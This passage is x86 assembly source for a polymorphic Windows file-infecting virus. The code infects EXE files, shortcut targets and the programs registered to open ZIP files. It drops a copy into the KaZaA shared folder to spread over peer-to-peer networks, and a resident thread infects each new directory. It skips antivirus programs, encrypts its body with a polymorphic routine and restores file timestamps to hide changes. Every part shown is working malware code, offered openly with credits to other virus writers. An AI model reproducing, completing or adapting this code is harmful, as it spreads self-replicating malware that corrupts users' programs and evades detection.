mov [search_handle2+ebp],eax
|
|||
|
|
|||
|
mov edx,offset wfd.cFileName
|
|||
|
add edx,ebp
|
|||
|
call infectlink
|
|||
|
fnf_loop2:
|
|||
|
mov edx,ebp
|
|||
|
add edx,offset olddir
|
|||
|
push edx
|
|||
|
call [ebp+_SetCurrentDirectoryA]
|
|||
|
|
|||
|
push ebp
|
|||
|
mov eax,offset wfd
|
|||
|
add eax,ebp
|
|||
|
push eax
|
|||
|
push [search_handle2+ebp]
|
|||
|
call [_FindNextFileA+ebp]
|
|||
|
pop ebp
|
|||
|
cmp eax,0
|
|||
|
je icd_end2
|
|||
|
mov edx,offset wfd.cFileName
|
|||
|
add edx,ebp
|
|||
|
call infectlink
|
|||
|
jmp fnf_loop2
|
|||
|
icd_end2:
|
|||
|
push [search_handle2+ebp]
|
|||
|
call [ebp+_FindClose]
|
|||
|
ret
|
|||
|
|
|||
|
infectlink:
|
|||
|
|
|||
|
push 0
|
|||
|
push 0
|
|||
|
push OPEN_EXISTING
|
|||
|
push 0
|
|||
|
push 0
|
|||
|
push GENERIC_READ+GENERIC_WRITE
|
|||
|
push edx
|
|||
|
call [ebp+_CreateFileA]
|
|||
|
mov [ebp+hfile2], eax
|
|||
|
|
|||
|
push 0
|
|||
|
push eax
|
|||
|
call [ebp+_GetFileSize]
|
|||
|
push eax
|
|||
|
|
|||
|
push 0
|
|||
|
push eax
|
|||
|
push 0
|
|||
|
push PAGE_READWRITE
|
|||
|
push 0
|
|||
|
push [ebp+hfile2]
|
|||
|
call [ebp+_CreateFileMappingA]
|
|||
|
|
|||
|
mov [ebp+hmap2], eax
|
|||
|
|
|||
|
pop eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
|
|||
|
push 0
|
|||
|
push 0
|
|||
|
push 2 ;FILE_MAP_ALL_ACCESS
|
|||
|
push [ebp+hmap2]
|
|||
|
call [ebp+_MapViewOfFile]
|
|||
|
|
|||
|
mov [ebp+haddress2], eax
|
|||
|
pop ebx ; length
|
|||
|
push eax
|
|||
|
pop edx
|
|||
|
add ebx,edx
|
|||
|
scashit:
|
|||
|
inc edx
|
|||
|
cmp edx,ebx
|
|||
|
jae invalidlnk
|
|||
|
|
|||
|
cmp word ptr [edx], "\:"
|
|||
|
jne scashit
|
|||
|
scashit2:
|
|||
|
inc edx
|
|||
|
cmp edx,ebx
|
|||
|
jae invalidlnk
|
|||
|
|
|||
|
cmp word ptr [edx], "\:"
|
|||
|
jne scashit2
|
|||
|
dec edx
|
|||
|
|
|||
|
call InfectFile
|
|||
|
invalidlnk:
|
|||
|
push [ebp+haddress2]
|
|||
|
call [ebp+_UnmapViewOfFile]
|
|||
|
|
|||
|
push [ebp+hmap2]
|
|||
|
call [ebp+_CloseHandle]
|
|||
|
|
|||
|
push [ebp+hfile2]
|
|||
|
call [ebp+_CloseHandle]
|
|||
|
|
|||
|
ret
|
|||
|
|
|||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|||
|
; Infect all Applications that are used to open ZIPs
|
|||
|
; and drop the file on kazaa's shared folder, if any
|
|||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|||
|
infectzippers:
|
|||
|
|
|||
|
pushad
|
|||
|
mov eax,offset a32_string
|
|||
|
add eax,ebp
|
|||
|
call VxGetModuleHandle
|
|||
|
or eax,eax
|
|||
|
je @@@End
|
|||
|
mov [advapi32+ebp],eax
|
|||
|
|
|||
|
mov edx,offset regopen_string
|
|||
|
add edx,ebp
|
|||
|
mov eax,[advapi32+ebp]
|
|||
|
call VxGetProcAddress
|
|||
|
or eax,eax
|
|||
|
je @@@End
|
|||
|
mov [_RegOpenKeyExA+ebp],eax
|
|||
|
|
|||
|
mov edx,offset regget_string
|
|||
|
add edx,ebp
|
|||
|
mov eax,[advapi32+ebp]
|
|||
|
call VxGetProcAddress
|
|||
|
or eax,eax
|
|||
|
je @@@End
|
|||
|
mov [_RegQueryValueExA+ebp],eax
|
|||
|
|
|||
|
mov edx,offset Regset
|
|||
|
add edx,ebp
|
|||
|
mov eax,[advapi32+ebp]
|
|||
|
call VxGetProcAddress
|
|||
|
or eax,eax
|
|||
|
je @@@End
|
|||
|
mov [_RegSetValueExA+ebp],eax
|
|||
|
|
|||
|
mov edx,offset close_string
|
|||
|
add edx,ebp
|
|||
|
mov eax,[advapi32+ebp]
|
|||
|
call VxGetProcAddress
|
|||
|
or eax,eax
|
|||
|
je @@@End
|
|||
|
mov [_RegCloseKey+ebp],eax
|
|||
|
|
|||
|
|
|||
|
player_loop:
|
|||
|
mov eax,offset HandleOpenedKey
|
|||
|
add eax,ebp
|
|||
|
push eax
|
|||
|
push 000F003Fh ;KEY_ALL_ACCESS
|
|||
|
push 0
|
|||
|
call pushstring
|
|||
|
db "Software\Microsoft\Windows\CurrentVersion\Explorer\"
|
|||
|
db "FileExts\.zip\OpenWithList",0
|
|||
|
pushstring:
|
|||
|
push 80000001h ;HKEY_CURRENT_USER
|
|||
|
call [ebp+ _RegOpenKeyExA]
|
|||
|
or eax, eax
|
|||
|
jnz @@End
|
|||
|
|
|||
|
call clean_buff
|
|||
|
mov eax,offset buff_
|
|||
|
add eax,ebp
|
|||
|
push eax
|
|||
|
mov eax, offset buff
|
|||
|
add eax,ebp
|
|||
|
push eax
|
|||
|
push 0
|
|||
|
push 0
|
|||
|
call pushvalue
|
|||
|
player db "a",0
|
|||
|
pushvalue:
|
|||
|
push dword ptr [ebp+HandleOpenedKey]
|
|||
|
call [ebp+_RegQueryValueExA]
|
|||
|
|
|||
|
push dword ptr [ebp+ HandleOpenedKey]
|
|||
|
call [ebp+_RegCloseKey] ; Close key handle
|
|||
|
|
|||
|
mov esi,offset buff
|
|||
|
mov edi,offset prog_buffer
|
|||
|
add esi,ebp
|
|||
|
add edi,ebp
|
|||
|
next_copy:
|
|||
|
lodsb
|
|||
|
cmp al,0
|
|||
|
je copy_done
|
|||
|
stosb
|
|||
|
jmp next_copy
|
|||
|
copy_done:
|
|||
|
mov esi,offset part2
|
|||
|
add esi,ebp
|
|||
|
mov ecx,part2_len
|
|||
|
rep movsb
|
|||
|
|
|||
|
mov eax, offset HandleOpenedKey
|
|||
|
add eax,ebp
|
|||
|
push eax
|
|||
|
push 000F003Fh ;KEY_ALL_ACCESS
|
|||
|
push 0
|
|||
|
mov eax, offset prog_itself
|
|||
|
add eax,ebp
|
|||
|
push eax
|
|||
|
push 80000000h ;HKEY_CLASSES_ROOT
|
|||
|
call [ebp+_RegOpenKeyExA]
|
|||
|
|
|||
|
or eax, eax
|
|||
|
jnz @@End
|
|||
|
|
|||
|
call clean_buff
|
|||
|
mov eax, offset buff_
|
|||
|
add eax,ebp
|
|||
|
push eax
|
|||
|
mov eax, offset buff
|
|||
|
add eax,ebp
|
|||
|
push eax
|
|||
|
push 0
|
|||
|
push 0
|
|||
|
push 0 ;Default value
|
|||
|
push dword ptr [ebp+HandleOpenedKey]
|
|||
|
call [ebp+_RegQueryValueExA]
|
|||
|
|
|||
|
push dword ptr [ebp+HandleOpenedKey]
|
|||
|
call [ebp+ _RegCloseKey]
|
|||
|
mov esi,ebp
|
|||
|
add esi,offset buff
|
|||
|
push esi
|
|||
|
loopsearch:
|
|||
|
cmp dword ptr [esi],"exe."
|
|||
|
je reached
|
|||
|
cmp dword ptr [esi],"EXE."
|
|||
|
je reached
|
|||
|
inc esi
|
|||
|
jmp loopsearch
|
|||
|
reached:
|
|||
|
add esi,4
|
|||
|
push esi
|
|||
|
pop edi
|
|||
|
mov al,0
|
|||
|
stosb
|
|||
|
|
|||
|
pop esi
|
|||
|
first_loop:
|
|||
|
mov ax,word ptr [esi+1]
|
|||
|
cmp ax, "\:"
|
|||
|
je skip_dec
|
|||
|
inc esi
|
|||
|
jmp first_loop
|
|||
|
skip_dec:
|
|||
|
mov edx,esi
|
|||
|
call InfectFile
|
|||
|
|
|||
|
inc byte ptr [ebp+player]
|
|||
|
jmp player_loop
|
|||
|
@@End:
|
|||
|
mov byte ptr [ebp+player],"a"
|
|||
|
mov eax,offset HandleOpenedKey
|
|||
|
add eax,ebp
|
|||
|
push eax
|
|||
|
push 000F003Fh ;KEY_ALL_ACCESS
|
|||
|
push 0
|
|||
|
call pushstring2
|
|||
|
db "SOFTWARE\KAZAA\LocalContent",0
|
|||
|
pushstring2:
|
|||
|
push 80000002h ;HKEY_CURRENT_USER
|
|||
|
call [ebp+ _RegOpenKeyExA]
|
|||
|
or eax, eax
|
|||
|
jnz @@@End
|
|||
|
|
|||
|
call clean_buff
|
|||
|
mov eax,offset buff_
|
|||
|
add eax,ebp
|
|||
|
push eax
|
|||
|
mov eax, offset buff
|
|||
|
add eax,ebp
|
|||
|
push eax
|
|||
|
push 0
|
|||
|
push 0
|
|||
|
call pushvalue2
|
|||
|
db "DownloadDir",0
|
|||
|
pushvalue2:
|
|||
|
push dword ptr [ebp+HandleOpenedKey]
|
|||
|
call [ebp+_RegQueryValueExA]
|
|||
|
|
|||
|
push dword ptr [ebp+ HandleOpenedKey]
|
|||
|
call [ebp+_RegCloseKey]
|
|||
|
push ebp
|
|||
|
mov eax,ebp
|
|||
|
add eax,offset currdir
|
|||
|
push eax
|
|||
|
push L 128
|
|||
|
call [_GetCurrentDirectoryA+ebp]
|
|||
|
pop ebp
|
|||
|
|
|||
|
mov edx,ebp
|
|||
|
add edx,offset buff
|
|||
|
push edx
|
|||
|
call [ebp+_SetCurrentDirectoryA]
|
|||
|
|
|||
|
call InfectCurrentDirectory
|
|||
|
call dropfile
|
|||
|
|
|||
|
mov edx,ebp
|
|||
|
add edx,offset currdir
|
|||
|
push edx
|
|||
|
call [ebp+_SetCurrentDirectoryA]
|
|||
|
@@@End:
|
|||
|
popad
|
|||
|
ret
|
|||
|
|
|||
|
clean_buff:
|
|||
|
pushad
|
|||
|
mov edi,offset buff_
|
|||
|
add edi,ebp
|
|||
|
mov dword ptr [edi],030h
|
|||
|
add edi,4
|
|||
|
mov ecx,30h
|
|||
|
mov al,0
|
|||
|
rep stosb
|
|||
|
popad
|
|||
|
ret
|
|||
|
|
|||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|||
|
; Drop a file in kazza's shared folder
|
|||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|||
|
|
|||
|
dropfile:
|
|||
|
mov edx,ebp
|
|||
|
add edx,offset fileee
|
|||
|
push edx
|
|||
|
call [ebp+_GetFileAttributesA]
|
|||
|
inc eax
|
|||
|
or eax,eax
|
|||
|
je makeit
|
|||
|
ret
|
|||
|
makeit:
|
|||
|
push 0
|
|||
|
push 0
|
|||
|
push 1 ; Create new
|
|||
|
push 0
|
|||
|
push 0
|
|||
|
push GENERIC_READ+GENERIC_WRITE
|
|||
|
mov edx,ebp
|
|||
|
add edx,offset fileee
|
|||
|
push edx
|
|||
|
call [ebp+_CreateFileA]
|
|||
|
mov [ebp+hfile],eax
|
|||
|
|
|||
|
push 0
|
|||
|
mov eax,4096 ;note that the filesize is hardcoded
|
|||
|
push eax
|
|||
|
push 0
|
|||
|
push PAGE_READWRITE
|
|||
|
push 0
|
|||
|
push [ebp+hfile]
|
|||
|
call [ebp+_CreateFileMappingA]
|
|||
|
|
|||
|
mov [ebp+hmap], eax
|
|||
|
|
|||
|
mov eax,4096
|
|||
|
push eax
|
|||
|
push 0
|
|||
|
push 0
|
|||
|
push 2 ;FILE_MAP_ALL_ACCESS
|
|||
|
push [ebp+hmap]
|
|||
|
call [ebp+_MapViewOfFile]
|
|||
|
|
|||
|
mov [ebp+haddress], eax
|
|||
|
|
|||
|
mov edi,eax
|
|||
|
mov esi,ebp
|
|||
|
add esi, offset dropstart
|
|||
|
mov ecx,dropend-dropstart
|
|||
|
nextat: ; Decompress compressed dropper
|
|||
|
lodsb ; file, i would like to thank
|
|||
|
or al,al ; Vecna for simple decompressor
|
|||
|
jnz nextbit
|
|||
|
dec ecx
|
|||
|
dec ecx
|
|||
|
push ecx
|
|||
|
lodsw
|
|||
|
xor ecx,ecx
|
|||
|
mov cx,ax
|
|||
|
mov al,0
|
|||
|
rep stosb
|
|||
|
pop ecx
|
|||
|
loop nextat
|
|||
|
jcxz quitta
|
|||
|
nextbit:
|
|||
|
stosb
|
|||
|
loop nextat
|
|||
|
quitta:
|
|||
|
push [ebp+haddress]
|
|||
|
call [ebp+_UnmapViewOfFile]
|
|||
|
|
|||
|
push [ebp+hmap]
|
|||
|
call [ebp+_CloseHandle]
|
|||
|
|
|||
|
push [ebp+hfile]
|
|||
|
call [ebp+_CloseHandle]
|
|||
|
ret
|
|||
|
|
|||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|||
|
; Get Kernel32 address, thanks billy !
|
|||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|||
|
|
|||
|
GetK32:
|
|||
|
_@1: jecxz WeFailed
|
|||
|
mov cx,word ptr [esi]
|
|||
|
xor cx,"4k"
|
|||
|
cmp cx,"ZM"xor "4k"
|
|||
|
jz CheckPE
|
|||
|
_@2: sub esi,10000h
|
|||
|
dec ecx
|
|||
|
jmp _@1
|
|||
|
CheckPE:
|
|||
|
mov edi,[esi+3Ch]
|
|||
|
add edi,esi
|
|||
|
mov cx,word ptr [edi]
|
|||
|
xor cx,"3a"
|
|||
|
cmp cx,"EP"xor "3a"
|
|||
|
jz WeGotK32
|
|||
|
jmp _@2
|
|||
|
WeFailed:
|
|||
|
mov ecx,cs
|
|||
|
xor cl,cl
|
|||
|
jecxz WeAreInWNT
|
|||
|
mov esi,kernel_
|
|||
|
jmp WeGotK32
|
|||
|
WeAreInWNT:
|
|||
|
mov esi,kernel_wNT
|
|||
|
WeGotK32:
|
|||
|
xchg eax,esi
|
|||
|
ret
|
|||
|
|
|||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|||
|
; Get APIs , also thanks billy !
|
|||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|||
|
|
|||
|
GetAPIs:
|
|||
|
@@1: lodsd
|
|||
|
push esi
|
|||
|
push edi
|
|||
|
call GetAPI_ET_CRC32
|
|||
|
pop edi
|
|||
|
pop esi
|
|||
|
stosd
|
|||
|
cmp byte ptr [esi],0BBh ; Last API?
|
|||
|
jz @@4
|
|||
|
jmp @@1
|
|||
|
@@4: ret
|
|||
|
|
|||
|
GetAPI_ET_CRC32:
|
|||
|
xor edx,edx
|
|||
|
xchg eax,edx
|
|||
|
mov word ptr [ebp+Counter],ax
|
|||
|
mov esi,3Ch
|
|||
|
add esi,[ebp+kernel]
|
|||
|
lodsw
|
|||
|
add eax,[ebp+kernel]
|
|||
|
|
|||
|
mov esi,[eax+78h]
|
|||
|
add esi,1Ch
|
|||
|
add esi,[ebp+kernel]
|
|||
|
|
|||
|
lea edi,[ebp+AddressTableVA]
|
|||
|
lodsd
|
|||
|
add eax,[ebp+kernel]
|
|||
|
stosd
|
|||
|
|
|||
|
lodsd
|
|||
|
add eax,[ebp+kernel]
|
|||
|
push eax
|
|||
|
stosd
|
|||
|
|
|||
|
lodsd
|
|||
|
add eax,[ebp+kernel]
|
|||
|
stosd
|
|||
|
|
|||
|
pop esi
|
|||
|
|
|||
|
@?_3: push esi
|
|||
|
lodsd
|
|||
|
add eax,[ebp+kernel]
|
|||
|
xchg edi,eax
|
|||
|
mov ebx,edi
|
|||
|
|
|||
|
push edi
|
|||
|
xor al,al
|
|||
|
scasb
|
|||
|
jnz $-1
|
|||
|
pop esi
|
|||
|
|
|||
|
sub edi,ebx
|
|||
|
|
|||
|
push edx
|
|||
|
call CRC32
|
|||
|
pop edx
|
|||
|
cmp edx,eax
|
|||
|
jz @?_4
|
|||
|
|
|||
|
pop esi
|
|||
|
add esi,4
|
|||
|
inc word ptr [ebp+Counter]
|
|||
|
jmp @?_3
|
|||
|
@?_4:
|
|||
|
pop esi
|
|||
|
movzx eax,word ptr [ebp+Counter]
|
|||
|
shl eax,1
|
|||
|
add eax,dword ptr [ebp+OrdinalTableVA]
|
|||
|
xor esi,esi
|
|||
|
xchg eax,esi
|
|||
|
lodsw
|
|||
|
shl eax,2
|
|||
|
add eax,dword ptr [ebp+AddressTableVA]
|
|||
|
xchg esi,eax
|
|||
|
lodsd
|
|||
|
add eax,[ebp+kernel]
|
|||
|
ret
|
|||
|
|
|||
|
CRC32:
|
|||
|
cld
|
|||
|
xor ecx,ecx
|
|||
|
dec ecx
|
|||
|
mov edx,ecx
|
|||
|
NextByteCRC:
|
|||
|
xor eax,eax
|
|||
|
xor ebx,ebx
|
|||
|
lodsb
|
|||
|
xor al,cl
|
|||
|
mov cl,ch
|
|||
|
mov ch,dl
|
|||
|
mov dl,dh
|
|||
|
mov dh,8
|
|||
|
NextBitCRC:
|
|||
|
shr bx,1
|
|||
|
rcr ax,1
|
|||
|
jnc NoCRC
|
|||
|
xor ax,08320h
|
|||
|
xor bx,0EDB8h
|
|||
|
NoCRC: dec dh
|
|||
|
jnz NextBitCRC
|
|||
|
xor ecx,eax
|
|||
|
xor edx,ebx
|
|||
|
dec edi
|
|||
|
jnz NextByteCRC
|
|||
|
not edx
|
|||
|
not ecx
|
|||
|
mov eax,edx
|
|||
|
rol eax,16
|
|||
|
mov ax,cx
|
|||
|
ret
|
|||
|
|
|||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|||
|
; This is the virus resident part, it will detect directory
|
|||
|
; change every 8 seconds and infect all files in the new one
|
|||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|||
|
|
|||
|
VThread:
|
|||
|
call get_delta
|
|||
|
get_delta:
|
|||
|
pop ebp
|
|||
|
sub ebp,offset get_delta
|
|||
|
|
|||
|
@loophere:
|
|||
|
mov eax,[ori_eip+ebp]
|
|||
|
mov [tmp_eip+ebp],eax
|
|||
|
call InfectCurrentDirectory
|
|||
|
mov eax,[tmp_eip+ebp]
|
|||
|
mov [ori_eip+ebp],eax
|
|||
|
|
|||
|
@sleepagain:
|
|||
|
push 8000
|
|||
|
call [ebp+_Sleep]
|
|||
|
|
|||
|
push ebp
|
|||
|
mov eax,ebp
|
|||
|
add eax,offset currdir
|
|||
|
push eax
|
|||
|
push L 128
|
|||
|
call [_GetCurrentDirectoryA+ebp]
|
|||
|
pop ebp
|
|||
|
|
|||
|
mov esi,ebp
|
|||
|
mov edi,esi
|
|||
|
add esi,offset currdir
|
|||
|
add edi,offset olddir
|
|||
|
xor ecx,ecx
|
|||
|
mov cl,128
|
|||
|
rep cmpsb
|
|||
|
je @sleepagain
|
|||
|
mov esi,ebp
|
|||
|
mov edi,esi
|
|||
|
add esi,offset currdir
|
|||
|
add edi,offset olddir
|
|||
|
xor ecx,ecx
|
|||
|
mov cl,128
|
|||
|
rep movsb
|
|||
|
jmp @loophere
|
|||
|
ret
|
|||
|
|
|||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|||
|
; This will launch the virus resident part
|
|||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|||
|
|
|||
|
LaunchVirusMainThread:
|
|||
|
pushad
|
|||
|
lea ebx,[ebp+offset ThreadID3]
|
|||
|
push ebx
|
|||
|
push 4h
|
|||
|
push 0h
|
|||
|
lea ebx,[ebp+offset VThread]
|
|||
|
push ebx
|
|||
|
push 0h
|
|||
|
push 0h
|
|||
|
call [ebp+_CreateThread]
|
|||
|
or eax,eax
|
|||
|
je @noway
|
|||
|
push eax
|
|||
|
|
|||
|
push -1h ;low priority
|
|||
|
push eax
|
|||
|
call [ebp+_SetThreadPriority]
|
|||
|
|
|||
|
call [ebp+_ResumeThread]
|
|||
|
@noway:
|
|||
|
popad
|
|||
|
ret
|
|||
|
|
|||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|||
|
; Infect all EXE files in current directory
|
|||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|||
|
|
|||
|
InfectCurrentDirectory:
|
|||
|
push ebp
|
|||
|
mov eax,offset wfd
|
|||
|
add eax,ebp
|
|||
|
push eax
|
|||
|
mov eax,offset exe_match
|
|||
|
add eax,ebp
|
|||
|
xor [eax],"Shit"
|
|||
|
push eax
|
|||
|
call [_FindFirstFileA+ebp]
|
|||
|
pop ebp
|
|||
|
|
|||
|
push eax
|
|||
|
mov eax,offset exe_match
|
|||
|
add eax,ebp
|
|||
|
xor [eax],"Shit"
|
|||
|
pop eax
|
|||
|
|
|||
|
inc eax
|
|||
|
or eax,eax
|
|||
|
je icd_end
|
|||
|
dec eax
|
|||
|
mov [search_handle+ebp],eax
|
|||
|
|
|||
|
mov edx,offset wfd.cFileName
|
|||
|
add edx,ebp
|
|||
|
call InfectFile
|
|||
|
|
|||
|
fnf_loop:
|
|||
|
push ebp
|
|||
|
mov eax,offset wfd
|
|||
|
add eax,ebp
|
|||
|
push eax
|
|||
|
push [search_handle+ebp]
|
|||
|
call [_FindNextFileA+ebp]
|
|||
|
pop ebp
|
|||
|
or eax,eax
|
|||
|
je icd_end
|
|||
|
mov edx,offset wfd.cFileName
|
|||
|
add edx,ebp
|
|||
|
call InfectFile
|
|||
|
jmp fnf_loop
|
|||
|
icd_end:
|
|||
|
push [search_handle+ebp]
|
|||
|
call [ebp+_FindClose]
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|||
|
; Infects EXE file pointed to by EDX
|
|||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|||
|
InfectFile:
|
|||
|
|
|||
|
push edx ; Don't infect AVs , thanks
|
|||
|
pop esi ; bumblebee ;)
|
|||
|
lea edi,avStrings+ebp
|
|||
|
mov ecx,vStringsCout
|
|||
|
testIfAvL:
|
|||
|
push esi
|
|||
|
mov ax,word ptr [edi]
|
|||
|
testAvLoop:
|
|||
|
cmp word ptr [esi],ax
|
|||
|
jne contTestLoop
|
|||
|
pop esi
|
|||
|
ret
|
|||
|
contTestLoop:
|
|||
|
inc esi
|
|||
|
cmp byte ptr [esi+3],0
|
|||
|
jne testAvLoop
|
|||
|
pop esi
|
|||
|
add edi,2
|
|||
|
loop testIfAvL
|
|||
|
|
|||
|
push edx
|
|||
|
push ebp
|
|||
|
mov eax,offset wfd
|
|||
|
add eax,ebp
|
|||
|
push eax
|
|||
|
push edx
|
|||
|
call [_FindFirstFileA+ebp]
|
|||
|
pop ebp
|
|||
|
|
|||
|
push eax
|
|||
|
call [ebp+_FindClose]
|
|||
|
|
|||
|
mov edx, [ebp+wfd.dwFileAttributes]
|
|||
|
test edx, 800h ; Avoid compressed
|
|||
|
je conttt ; files
|
|||
|
pop edx
|
|||
|
ret
|
|||
|
conttt:
|
|||
|
|
|||
|
test edx,4h
|
|||
|
je contttt
|
|||
|
pop edx
|
|||
|
ret
|
|||
|
contttt:
|
|||
|
pop edx
|
|||
|
mov esi,edx
|
|||
|
mov edi,ebp
|
|||
|
add edi,offset wfd.cFileName
|
|||
|
@morecopy:
|
|||
|
lodsb
|
|||
|
stosb
|
|||
|
cmp al,0
|
|||
|
jne @morecopy
|
|||
|
|
|||
|
lea esi,[ebp+wfd.cFileName]
|
|||
|
push 80h
|
|||
|
push edx
|
|||
|
apicall _SetFileAttributesA
|
|||
|
|
|||
|
call OpenFile
|
|||
|
|
|||
|
cmp_ eax,CantOpen
|
|||
|
|
|||
|
mov dword ptr [ebp+FileHandle],eax
|
|||
|
|
|||
|
mov ecx,dword ptr [ebp+wfd.nFileSizeLow]
|
|||
|
call CreateMap
|
|||
|
cmp_ eax,CloseFile
|
|||
|
|
|||
|
mov dword ptr [ebp+MapHandle],eax
|
|||
|
|
|||
|
mov ecx,dword ptr [ebp+wfd.nFileSizeLow]
|
|||
|
call MapFile
|
|||
|
cmp_ eax,UnMapFile
|
|||
|
|
|||
|
mov dword ptr [ebp+MapAddress],eax
|
|||
|
|
|||
|
mov esi,eax
|
|||
|
|
|||
|
mov esi,[esi+3Ch]
|
|||
|
add esi,eax
|
|||
|
mov ecx,dword ptr [esi];
|
|||
|
xor cx,"7f"
|
|||
|
cmp cx,"EP"xor"7f"
|
|||
|
jnz NoInfect
|
|||
|
test word ptr [esi+16h],2000h ; Don't infect dlls
|
|||
|
jnz NoInfect
|
|||
|
|
|||
|
cmp dword ptr [esi+mark],012345678h ; Was it infected?
|
|||
|
jz NoInfect
|
|||
|
|
|||
|
push dword ptr [esi+3Ch]
|
|||
|
|
|||
|
push dword ptr [ebp+MapAddress]
|
|||
|
apicall _UnmapViewOfFile
|
|||
|
|
|||
|
push dword ptr [ebp+MapHandle]
|
|||
|
apicall _CloseHandle
|
|||
|
|
|||
|
pop ecx
|
|||
|
|
|||
|
mov eax,dword ptr [ebp+wfd.nFileSizeLow]
|
|||
|
add eax,[ebp+viruslen]
|
|||
|
|
|||
|
call Align
|
|||
|
xchg ecx,eax
|
|||
|
|
|||
|
call CreateMap
|
|||
|
cmp_ eax,CloseFile
|
|||
|
|
|||
|
mov dword ptr [ebp+MapHandle],eax
|
|||
|
|
|||
|
mov ecx,dword ptr [ebp+NewSize]
|
|||
|
call MapFile
|
|||
|
cmp_ eax,UnMapFile
|
|||
|
|
|||
|
mov dword ptr [ebp+MapAddress],eax
|
|||
|
|
|||
|
; I would like to thank billy for the PE infection algorithm
|
|||
|
|
|||
|
mov esi,eax
|
|||
|
|
|||
|
mov esi,[esi+3Ch]
|
|||
|
add esi,eax
|
|||
|
|
|||
|
mov edi,esi
|
|||
|
|
|||
|
movzx eax,word ptr [edi+06h]
|
|||
|
dec eax
|
|||
|
imul eax,eax,28h
|
|||
|
add esi,eax
|
|||
|
add esi,78h
|
|||
|
mov edx,[edi+74h]
|
|||
|
shl edx,3
|
|||
|
add esi,edx
|
|||
|
|
|||
|
mov eax,[edi+28h]
|
|||
|
mov dword ptr [ebp+ori_eip],eax
|
|||
|
|
|||
|
mov edx,[esi+10h]
|
|||
|
mov ebx,edx
|
|||
|
add edx,[esi+14h]
|
|||
|
|
|||
|
push edx
|
|||
|
|
|||
|
mov eax,ebx
|
|||
|
|
|||
|
add eax,[esi+0Ch]
|
|||
|
mov [edi+28h],eax
|
|||
|
mov dword ptr [ebp+NewEIP],eax
|
|||
|
|
|||
|
mov eax,[esi+10h]
|
|||
|
add eax,[ebp+viruslen]
|
|||
|
mov ecx,[edi+3Ch]
|
|||
|
call Align
|
|||
|
|
|||
|
mov [esi+10h],eax
|
|||
|
mov [esi+08h],eax
|
|||
|
|
|||
|
pop edx
|
|||
|
|
|||
|
mov eax,[esi+10h]
|
|||
|
add eax,[esi+0Ch]
|
|||
|
mov [edi+50h],eax
|
|||
|
|
|||
|
or dword ptr [esi+24h],section_flags
|
|||
|
mov dword ptr [edi+mark],012345678h
|
|||
|
|
|||
|
lea esi,[ebp+code_start]
|
|||
|
xchg edi,edx
|
|||
|
add edi,dword ptr [ebp+MapAddress]
|
|||
|
mov [ebp+fromhere], edi
|
|||
|
mov ecx, enc-code_start ; code_len
|
|||
|
rep movsb
|
|||
|
|
|||
|
no_null_key:
|
|||
|
call random32
|
|||
|
cmp al,0ffh
|
|||
|
je no_null_key ; Avoid 0 keys
|
|||
|
cmp ah,068h
|
|||
|
je no_null_key
|
|||
|
mov byte ptr[ebp+key2],al
|
|||
|
xor byte ptr[ebp+key2],0ffh
|
|||
|
mov bl,al
|
|||
|
mov byte ptr [ebp+key],ah
|
|||
|
xor byte ptr [ebp+key],068h
|
|||
|
mov ecx,enc_end-enc
|
|||
|
@enc_loop:
|
|||
|
lodsb
|
|||
|
sub al,bl
|
|||
|
neg al
|
|||
|
ror al,1
|
|||
|
not al
|
|||
|
neg al
|
|||
|
xor al,ah
|
|||
|
stosb
|
|||
|
dec ecx
|
|||
|
or ecx,ecx
|
|||
|
jne @enc_loop
|
|||
|
|
|||
|
mov ecx,code_end-enc_end
|
|||
|
rep movsb
|
|||
|
pushad
|
|||
|
mov edi,[ebp+fromhere]
|
|||
|
add edi,poly_enc-code_start
|
|||
|
mov ecx,((poly_end-poly_enc)/4)+1
|
|||
|
mov eax,dword ptr[ebp+keyy]
|
|||
|
polyenc_loop:
|
|||
|
xor dword ptr [edi],eax
|
|||
|
add edi,4h
|
|||
|
dec ecx
|
|||
|
cmp ecx,0h
|
|||
|
jne polyenc_loop
|
|||
|
popad
|
|||
|
mov ecx,[ebp+dec_len]
|
|||
|
mov esi,[ebp+decplace]
|
|||
|
rep movsb ; now copy the poly decryptor
|
|||
|
|
|||
|
jmp UnMapFile
|
|||
|
|
|||
|
NoInfect:
|
|||
|
dec byte ptr [ebp+infections]
|
|||
|
mov ecx,dword ptr [ebp+wfd.nFileSizeLow]
|
|||
|
call TruncFile
|
|||
|
|
|||
|
UnMapFile:
|
|||
|
push dword ptr [ebp+MapAddress]
|
|||
|
apicall _UnmapViewOfFile
|
|||
|
|
|||
|
CloseMap:
|
|||
|
push dword ptr [ebp+MapHandle]
|
|||
|
apicall _CloseHandle
|
|||
|
|
|||
|
CloseFile:
|
|||
|
mov eax,ebp
|
|||
|
add eax,offset wfd.ftCreationTime
|
|||
|
push eax
|
|||
|
add eax,8
|
|||
|
push eax
|
|||
|
add eax,8
|
|||
|
push eax
|
|||
|
push dword ptr [ebp+FileHandle]
|
|||
|
apicall _SetFileTime
|
|||
|
|
|||
|
